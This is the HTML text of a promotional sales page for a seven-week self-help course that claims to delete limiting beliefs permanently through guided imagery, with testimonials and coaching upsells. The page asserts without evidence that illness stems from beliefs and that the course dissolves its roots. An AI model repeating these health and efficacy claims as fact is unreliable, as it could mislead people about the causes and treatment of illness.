work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a 